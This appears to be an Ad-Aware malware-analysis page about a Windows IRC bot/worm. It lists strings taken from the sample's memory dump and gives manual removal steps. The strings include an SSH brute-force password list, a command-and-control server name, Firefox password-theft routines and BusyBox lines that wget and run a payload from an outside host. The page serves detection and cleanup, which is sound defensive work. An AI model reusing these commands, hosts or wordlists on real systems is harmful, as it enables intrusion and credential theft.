Agreed on COMP_CS method: %s
Agreed on MAC_SC method: %s
Agreed on MAC_CS method: %s
Agreed on CRYPT_SC method: %s
Agreed on CRYPT_CS method: %s
Agreed on HOSTKEY method: %s
Agreed on KEX method: %s
The requested method(s) are not currently supported
ssh-dss
ssh-rsa
[email protected]
[email protected]
?456789:;<=
!"#$%&'()* ,-./0123
zcÁ
%System%.exe
192.168.1.120
SC// Random Port Scan started on 108.x.x.x:22 with a delay of 10 seconds for 0 minutes using 60 threads.
EFTP// Server started, Port: 16759, File: %System%.exe.
"%local server IP%"

system32.exe_3220_rwx_00400000_000F6000:

.text
`.rdata
@.data
.rsrc
PSSh]
t1SSSSh
SSShx
PSSh*t@
3|$43|$$
3|$<3|$$
3|$(3|$,
.EOWSU
msn.msg
msn.stop
login
firefox
join
Big Number part of OpenSSL 0.9.8j 07 Jan 2009
SHA1 part of OpenSSL 0.9.8j 07 Jan 2009
MD5 part of OpenSSL 0.9.8j 07 Jan 2009
RSA part of OpenSSL 0.9.8j 07 Jan 2009
DSA part of OpenSSL 0.9.8j 07 Jan 2009
len>=0 && len<=(int)sizeof(ctx->key)
j <= (int)sizeof(ctx->key)
EVP part of OpenSSL 0.9.8j 07 Jan 2009
CERTIFICATE REQUEST
NEW CERTIFICATE REQUEST
CERTIFICATE
RSA PRIVATE KEY
DSA PRIVATE KEY
EC PRIVATE KEY
RAND part of OpenSSL 0.9.8j 07 Jan 2009
You need to read the OpenSSL FAQ, http://www.openssl.org/support/faq.html
%s(%d): OpenSSL internal error, assertion failed: %s
Diffie-Hellman part of OpenSSL 0.9.8j 07 Jan 2009
SHA-256 part of OpenSSL 0.9.8j 07 Jan 2009
SHA-512 part of OpenSSL 0.9.8j 07 Jan 2009
DlRIPE-MD160 part of OpenSSL 0.9.8j 07 Jan 2009
CAST part of OpenSSL 0.9.8j 07 Jan 2009
RC4 part of OpenSSL 0.9.8j 07 Jan 2009
Blowfish part of OpenSSL 0.9.8j 07 Jan 2009
Microsoft Local Key set
LocalKeySet
id-Gost28147-89-None-KeyMeshing
id-Gost28147-89-CryptoPro-KeyMeshing
password based MAC
id-PasswordBasedMAC
X509v3 Certificate Issuer
certificateIssuer
certicom-arc
Proxy Certificate Information
proxyCertInfo
Microsoft Smartcardlogin
msSmartcardLogin
joint-iso-itu-t
JOINT-ISO-ITU-T
set-rootKeyThumb
setAttr-Cert
setCext-cCertRequired
setCext-certType
setct-CertResTBE
setct-CertReqTBEX
setct-CertReqTBE
setct-AcqCardCodeMsgTBE
setct-CertInqReqTBS
setct-CertResData
setct-CertReqTBS
setct-CertReqData
setct-PCertResTBS
setct-PCertReqData
setct-AcqCardCodeMsg
certificate extensions
set-certExt
set-msgExt
id-ecPublicKey
id-cmc-confirmCertAcceptance
id-cmc-getCert
id-regInfo-certReq
id-regCtrl-protocolEncrKey
id-regCtrl-oldCertID
id-it-revPassphrase
id-it-keyPairParamRep
id-it-keyPairParamReq
id-it-unsupportedOIDs
id-it-caKeyUpdateInfo
id-it-encKeyPairTypes
id-it-signKeyPairTypes
id-it-caProtEncCert
id-mod-attribute-cert
id-mod-qualified-cert-93
id-mod-qualified-cert-88
id-smime-aa-ets-certCRLTimestamp
id-smime-aa-ets-certValues
id-smime-aa-ets-CertificateRefs
id-smime-aa-ets-otherSigCert
id-smime-aa-smimeEncryptCerts
id-smime-aa-signingCertificate
id-smime-aa-encrypKeyPref
id-smime-aa-msgSigDigest
id-smime-ct-publishCert
id-smime-mod-msg-v3
sdsiCertificate
x509Certificate
localKeyID
certBag
pkcs8ShroudedKeyBag
keyBag
pbeWithSHA1And2-KeyTripleDES-CBC
pbeWithSHA1And3-KeyTripleDES-CBC
TLS Web Client Authentication
TLS Web Server Authentication
X509v3 Extended Key Usage
extendedKeyUsage
X509v3 Authority Key Identifier
authorityKeyIdentifier
X509v3 Certificate Policies
certificatePolicies
X509v3 Private Key Usage Period
privateKeyUsagePeriod
X509v3 Key Usage
keyUsage
X509v3 Subject Key Identifier
subjectKeyIdentifier
Netscape Certificate Sequence
nsCertSequence
Netscape CA Policy Url
nsCaPolicyUrl
Netscape Renewal Url
nsRenewalUrl
Netscape CA Revocation Url
nsCaRevocationUrl
Netscape Revocation Url
nsRevocationUrl
Netscape Base Url
nsBaseUrl
Netscape Cert Type
nsCertType
Netscape Certificate Extension
nsCertExt
extendedCertificateAttributes
challengePassword
dhKeyAgreement
pubkey
PEM part of OpenSSL 0.9.8j 07 Jan 2009
phrase is too short, needs to be at least %d chars
Enter PEM pass phrase:
TRUSTED CERTIFICATE
X509 CERTIFICATE
PRIVATE KEY
ANY PRIVATE KEY
ENCRYPTED PRIVATE KEY
enc_key
key_enc_algor
cert
d.encrypted
d.digest
d.signed_and_enveloped
d.enveloped
d.sign
d.data
d.other
NETSCAPE_CERT_SEQUENCE
certs
.\crypto\pem\pem_pkey.c
X509_PUBKEY
public_key
priv_key
pub_key
.\crypto\ec\ec_key.c
EC_PRIVATEKEY
publicKey
privateKey
value.implicitlyCA
value.parameters
value.named_curve
p.char_two
p.prime
p.ppBasis
p.tpBasis
p.onBasis
p.other
EVP_CIPHER_key_length(cipher) <= (int)sizeof(md_tmp)
USER32.DLL
NETAPI32.DLL
KERNEL32.DLL
ADVAPI32.DLL
lhash part of OpenSSL 0.9.8j 07 Jan 2009
Stack part of OpenSSL 0.9.8j 07 Jan 2009
.\crypto\dh\dh_key.c
ASN.1 part of OpenSSL 0.9.8j 07 Jan 2009
value.single
value.set
.\crypto\evp\evp_key.c
nkey <= EVP_MAX_KEY_LENGTH
cert_info
EC part of OpenSSL 0.9.8j 07 Jan 2009
ECDSA part of OpenSSL 0.9.8j 07 Jan 2009
PKCS8_PRIV_KEY_INFO
pkey
pkeyalg
.\crypto\evp\evp_pkey.c
keylen <= sizeof key
.\crypto\pkcs12\p12_key.c
RC2 part of OpenSSL 0.9.8j 07 Jan 2009
IDEA part of OpenSSL 0.9.8j 07 Jan 2009
AUTHORITY_KEYID
keyid
X509_CERT_PAIR
X509_CERT_AUX
keylength
keyfunc
MD2 part of OpenSSL 0.9.8j 07 Jan 2009
%'%1%=%C%K%O%s%
.%.-.3.7.9.?.W.[.o.y.
C%C'C3C7C9COCWCiC
Verifying - %s
%lu:%s:%s:%d:%s
error:lX:%s:%s:%s
d.usernotice
d.cpsuri
CERTIFICATEPOLICIES
%*sCPS: %s
%*sExplicit Text: %s
%*sNumber%s:
%*sOrganization: %s
d.registeredID
d.iPAddress
d.uniformResourceIdentifier
d.ediPartyName
d.directoryName
d.dNSName
d.rfc822Name
d.otherName
value.bag
value.safes
value.shkeybag
value.keybag
value.sdsicert
value.x509cert
value.other
'() ,-./:=?
CONF part of OpenSSL 0.9.8j 07 Jan 2009
%d.%d.%d.%d/%d.%d.%d.%d
%*s%s:
%*sPolicy Text: %s
%*scrlUrl:
EXTENDED_KEY_USAGE
%*sZone: %s, User:
certificateHold
Certificate Hold
cessationOfOperation
Cessation Of Operation
keyCompromise
Key Compromise
name.relativename
name.fullname
.\crypto\x509v3\v3_akey.c
IP Address:%d.%d.%d.%d
URI:%s
DNS:%s
email:%s
EdiPartyName:
X400Name:
othername:
PKEY_USAGE_PERIOD
keyCertSign
Certificate Sign
keyAgreement
Key Agreement
keyEncipherment
Key Encipherment
.\crypto\x509v3\v3_skey.c
CONF_def part of OpenSSL 0.9.8j 07 Jan 2009
[[%s]]
[%s] %s=%s
PROXY_CERT_INFO_EXTENSION
crlUrl
certStatus
certId
OCSP_CERTSTATUS
value.unknown
value.revoked
value.good
value.byKey
value.byName
reqCert
OCSP_CERTID
issuerKeyHash
%s - d:d:d %d%s
\X
- %-15s
%s.dll
deflate 1.2.3 Copyright 1995-2005 Jean-loup Gailly
1.2.3
inflate 1.2.3 Copyright 1995-2005 Mark Adler
__MSVCRT_HEAP_SELECT
GetWindowsDirectoryA
VkKeyScanA
keybd_event
USER32.dll
RegCloseKey
RegOpenKeyExA
RegCreateKeyExA
ADVAPI32.dll
ole32.dll
OLEAUT32.dll
USERENV.dll
WS2_32.dll
GetCPInfo
GetProcessWindowStation
DI32.dll
ReportEventA
reptile.exe
libssh2_banner_set
libssh2_base64_decode
libssh2_channel_close
libssh2_channel_direct_tcpip_ex
libssh2_channel_eof
libssh2_channel_flush_ex
libssh2_channel_forward_accept
libssh2_channel_forward_cancel
libssh2_channel_forward_listen_ex
libssh2_channel_free
libssh2_channel_get_exit_status
libssh2_channel_handle_extended_data
libssh2_channel_handle_extended_data2
libssh2_channel_open_ex
libssh2_channel_process_startup
libssh2_channel_read_ex
libssh2_channel_receive_window_adjust
libssh2_channel_request_pty_ex
libssh2_channel_request_pty_size_ex
libssh2_channel_send_eof
libssh2_channel_set_blocking
libssh2_channel_setenv_ex
libssh2_channel_wait_closed
libssh2_channel_wait_eof
libssh2_channel_window_read_ex
libssh2_channel_window_write_ex
libssh2_channel_write_ex
libssh2_channel_x11_req_ex
libssh2_hostkey_hash
libssh2_poll
libssh2_poll_channel_read
libssh2_session_abstract
libssh2_session_block_directions
libssh2_session_callback_set
libssh2_session_disconnect_ex
libssh2_session_flag
libssh2_session_free
libssh2_session_get_blocking
libssh2_session_init_ex
libssh2_session_last_errno
libssh2_session_last_error
libssh2_session_method_pref
libssh2_session_methods
libssh2_session_set_blocking
libssh2_session_startup
libssh2_trace
libssh2_userauth_authenticated
libssh2_userauth_hostbased_fromfile_ex
libssh2_userauth_keyboard_interactive_ex
libssh2_userauth_list
libssh2_userauth_password_ex
libssh2_userauth_publickey_fromfile_ex
sshspreadscan
sshgodscan
sshadminscan
ntpass
Exploit FTPD: %d, Total: %d.
%s: %d,
%s Exploit Statistics:
%s.%s.%s.%s
%s Scan not active.
%s Current IP: %s.
%s Server started, Port: %i, File: %s.
%d.%d.%d.%d
%s Finished at %s:%d after %d minute(s) of scanning.
%s %s:%d, Scan thread: %d, Sub-thread: %d.
%s Failed to initialize critical section, error: <%d>
%s Portscan: %s:%d open.
Failed auth by %s(%s@%s)
Whats up %s? Im ready to rock!
Spy: %s!%s@%s (PM: "%s")
Fail by: %s!%s@%s (Pass Tried: %s)
%s out.
%s already running: <%d>.
Failed to start thread %s, error: <%d>.
[Current task] %s [System uptime] %s [Bot Uptime] %s
Bot installed on: %s.
Go fuck yourself %s.
MSN// Message & Zipfile sent to: %d contacts.
I tried to fool %d morons.
MSN// Sent Stats - Messages: %d :: Files: %d :: Message & Files: %d.
Removed by: %s!%s@%s
Advapi.dll Failed
PStore.dll Failed.
%s Failed to parse command.
%s Failed to start scan thread, error: <%d>.
%s %s Port Scan started on %s:%d with a delay of %d seconds for %d minutes using %d threads.
%s No subnet class specified, try "-a" or "-b" or "-c"
%s Could not parse external IP.
%s Trying to get external IP.
%s Failed to start scan, no IP specified.
%d.x.x.x
%s Failed to start scan, port is invalid.
%s Already scanning with %d threads. Too many specified.
Updating from %s (%s)
%stempfile%d%d%d%d%d.exe
Downloading %s and saving it to: %s.
Failed to start socks4 daemon (%s)
Socks(4) server started on %s:%i
Starting firefox pstore
FIREFOX Threads
Process Finished: "%s", Total Running Time: %s.
File executed: %s
Unable to create process: "%s"
%s Couldn't parse path, error: <%d>
%.1fkb downloaded to %s (%.1fkbps)
Couldn't open file for writing: %s.
PK11_CheckUserPassword
PK11_GetInternalKeySlot
softokn3.dll
sqlite3.dll
nssutil3.dll
plds4.dll
nspr4.dll
mozcrt19.dll
nss3.dll
plc4.dll
%s %s:%s
SOFTWARE\Clients\StartMenuInternet\firefox.exe\shell\open\command
\profiles.ini
Application Data\Mozilla\Firefox
signons3.txt
signons2.txt
signons1.txt
%s File transfer complete to IP: %s.
%s File transfer complete to IP: %s, File: %s, Size: %s bytes, Total sends: %i.
%s Started send to IP: %s.
200 PORT command successful.
PORT
%s %s LIST request from: %s
425 Passive not supported on this server
215 StnyFtpd
331 Password required
%s %s
%s Couldn't open data connection to: %s:%i, error: <%d>.
Ping Timeout? (%d-%d)%d/%d
Login list completed!
<%i> %s!%s@%s
Logins:
USER blaze * 0 :%s
NICK %s
{%s-%s-%s-%s-%s}
{iNF-%s-%s-%s-%s-%s}
nigzss.txt
TskMultiChatForm.UnicodeClass
__oxFrame.class__
PASS %s
QUIT %s
PONG %s
NICK
PRIVMSG
JOIN
NOTICE %s :%s
PRIVMSG %s :%s
JOIN %s
JOIN %s %s
PART %s
[%s|%s]
shlwapi.dll
pstorec.dll
psapi.dll
userenv.dll
SQLDisconnect
SQLFreeHandle
SQLAllocHandle
SQLExecDirect
SQLSetEnvAttr
SQLDriverConnect
odbc32.dll
ShellExecuteA
shell32.dll
mpr.dll
GetUdpTable
GetTcpTable
iphlpapi.dll
dnsapi.dll
netapi32.dll
Mozilla/4.0 (compatible)
InternetCrackUrlA
InternetOpenUrlA
FtpPutFileA
FtpGetFileA
HttpSendRequestA
HttpOpenRequestA
wininet.dll
ws2_32.dll
RegEnumKeyExA
advapi32.dll
user32.dll
kernel32.dll
%s!%s@%s
NICK {%s-%s-%s-%s-%s}
https:/
http:/
system32.exe
Windows Data Serivce
#sshscan2
EFTP//
ftpd.exe
underirc.sytes.net.
#sshchannel2
SOFTWARE\Microsoft\Windows\CurrentVersion\Run\
%s\%s
No %s thread found.
%s thread stopped.
[.ShellClassInfo]
CLSID={645FF040-5081-101B-9F08-00AA002F954E}
\Desktop.ini
\autorun.inf
icon=%SystemRoot%\system32\SHELL32.dll,4
http://www.whatismyip.com
http://checkip.dyndns.org
del "%s">nul
if exist "%s" goto Repeat
ping 0.0.0.0>nul
%s\removeMe%i%i%i%i.bat
%s%%s
%d day%s (%0.2d hours & %0.2d mins)
passwd
01010101
10101010
rootwebmaster
rootwebadmin
ftpuserftpuser
mysqlmysql
pgsqlpgsql
webweb
webmasterwebmaster
ftpserver
webserver
ftpftp
webadmin
webadmin1
webmaster
0987654321
1234567890
monkey1
PaSsWoRd
69696969
mypass
12341234
7654321
87654321
monkey
password1
newpass
systempass
%s %s: SSH USELESS: root@%s %s .
%s %s: SSH WIN: root@%s %s .
password
%s %s: SSH LOL: root:%s@%s .
BusyBox Instructed: %s.
./1.jpg
chmod  x 1.jpg
test ! -e 1.jpg && busybox wget http://www.e-qacs.com/1.jpg
wget http://www.e-qacs.com/1.jpg
BusyBox Fail@ShellOpen: %s.
BusyBox Fail@PtyOpen: %s.
BusyBox Fail@ChannelOpen: %s.
Setting local Banner: %s
Setting Callback %d
Unable to ask for ssh-userauth service
Would block asking for ssh-userauth service
ssh-userauth
Unable to exchange encryption keys
Would block exchanging encryption keys
session_startup for socket %d
Received Banner: %s
SSH-2.0-libssh2_1.0
Disconnecting: reason=%d, desc=%s, lang=%s
Setting blocking mode on session %d
Invalid descriptor passed to libssh2_poll()
Permitted auth methods: %s
ssh-connection
Unable to send userauth-password-change request
Unable to allocate memory for userauth-password-change request
Password expired, and callback failed
Password Expired, and no callback specified
Password authentication successful
Password change required
Unable to send userauth-password request
Attempting to login using password authentication
Unable to allocate memory for userauth-password request
Invalid signature for supplied public key, or bad username/public key combination
Invalid key data, not base64 encoded
Invalid public key data
Missing public key data
Unable to read public key from file
Unable to allocate memory for public key data
Invalid data in public key file
Unable to open public key file
Loading public key file: %s
Unable to initialize private key from file
No handler for specified private key
Loading private key file: %s
Publickey authentication successful
Attempting publickey authentication -- phase 2
Failed allocating additional space for userauth-publickey packet
Username/PublicKey combination invalid
Pubkey authentication prematurely successful
Unable to send userauth-publickey request
Attempting publickey authentication
publickey
Keyboard-interactive authentication successful
Unable to send userauth-keyboard-interactive request
Unable to allocate memory for keyboard-interactive prompt message
Unable to allocate memory for keyboard-interactive response packet
Keyboard-interactive response callback function invoked
Unable to allocate memory for keyboard-interactive responses array
Unable to allocate memory for keyboard-interactive prompts array
Unable to allocate memory for keyboard-interactive 'instruction' request field
Unable to allocate memory for keyboard-interactive 'name' request field
Unable to send keyboard-interactive request
Attempting keyboard-interactive authentication
keyboard-interactive
Unable to allocate memory for keyboard-interactive authentication
Opening Channel - win %d pack %d
direct-tcpip
Unable to allocate memory for direct-tcpip connection
Requesting direct-tcpip session to from %s:%d to %s:%d
Dynamic tcpip-forward port allocated: %d
0.0.0.0
tcpip-forward
Requesting tcpip-forward session for %s:%d
cancel-tcpip-forward
Cancelling tcpip-forward session for %s:%d
Setting remote environment variable: %s=%s on channel %lu/%lu
Requesting x11-req for channel %lu/%lu: single=%d proto=%s cookie=%s screen=%d
starting request(%s) on channel %lu/%lu, message=%s
Flushing %d bytes of data from stream %lu on channel %lu/%lu
Setting channel %lu/%lu handle_extended_data mode to %d
Reading %d of buffered data from %lu/%lu/%d
Attempting to read %d bytes from channel %lu/%lu stream #%d
libssh2_packet_write returned EAGAIN
Sending %d bytes on channel %lu/%lu, stream_id=%d
Splitting write block due to %lu byte packet_size on %lu/%lu/%d
Splitting write block due to %lu byte window_size on %lu/%lu/%d
Writing %d bytes on channel %lu/%lu, stream #%d
libssh2_channel_wait_closed() invoked when channel is not in EOF state
Renegotiating Keys
Unable to allocate memory for LIBSSH2_PACKET
X11 Connection Received from %s:%ld on channel %lu
Remote received connection from %s:%ld to %s:%ld
forwarded-tcpip
Ignoring extended data and refunding %d bytes
Debug Packet: %s
Disconnect(%d): %s(%s)
Packet type %d received, length=%d
Looking for packet of type: %d
May block until packet of type %d becomes available
Redirecting into the key re-exchange
Initiating Diffie-Hellman Group1 Key Exchange
Server to Client HMAC Key calculated
Client to Server HMAC Key calculated
Server to Client IV and Key calculated
Client to Server IV and Key calculated
Received NEWKEYS message
Timed out waiting for NEWKEYS
Unable to send NEWKEYS message
Sending NEWKEYS message
Unable to verify hostkey signature
Unable to initialize hostkey importer
Unable to allocate memory for a copy of the host key
Burnt packet of type: x
Sending KEX packet %d
Initiating Diffie-Hellman Group14 Key Exchange
Unrecoverable error exchanging keys
Agreed on COMP_SC method: %s
Agreed on COMP_CS method: %s
Agreed on MAC_SC method: %s
Agreed on MAC_CS method: %s
Agreed on CRYPT_SC method: %s
Agreed on CRYPT_CS method: %s
Agreed on HOSTKEY method: %s
Agreed on KEX method: %s
The requested method(s) are not currently supported
ssh-dss
ssh-rsa
[email protected]
[email protected]
?456789:;<=
!"#$%&'()* ,-./0123
zcÁ
%System%.exe
192.168.1.120
SC// Random Port Scan started on 108.x.x.x:22 with a delay of 10 seconds for 0 minutes using 60 threads.
EFTP// Server started, Port: 16759, File: %System%.exe.
"%local server IP%"


Remove it with Ad-Aware

  1. Click (here) to download and install Ad-Aware Free Antivirus.
  2. Update the definition files.
  3. Run a full scan of your computer.


Manual removal*

  1. Terminate malicious process(es) (How to End a Process With the Task Manager):

    %original file name%.exe:3272
    system32.exe:3300

  2. Delete the original Trojan file.
  3. Delete or disinfect the following files created/modified by the Trojan:

    %System%.exe (7547 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
    %Documents and Settings%\%current user%\Cookies\8LQCYG2J.txt (119 bytes)
    %Documents and Settings%\%current user%\Cookies\N8VWP5L8.txt (119 bytes)

  4. Delete the following value(s) in the autorun key (How to Work with System Registry):

    [HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
    "Windows Data Serivce" = "system32.exe"

  5. Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
  6. Find and delete all copies of the worm's file together with "autorun.inf" scripts on removable drives.
  7. Reboot the computer.

*Manual removal may cause unexpected system behaviour and should be performed at your own risk.

No votes yet


Lavasoft is the maker of Ad-Aware, the world's most popular anti-malware software with over 450 million downloads.
© 2026 Lavasoft. All rights reserved.
Terms Of Use |   Privacy Policy


x

Our best antivirus yet!

Fresh new look. Faster scanning. Better protection.

Enjoy unique new features, lightning fast scans and a simple yet beautiful new look in our best antivirus yet!

For a quicker, lighter and more secure experience, download the all new adaware antivirus 12 now!

Download adaware antivirus 12
No thanks, continue to lavasoft.com
close x

Discover the new adaware antivirus 12

Our best antivirus yet

Download Now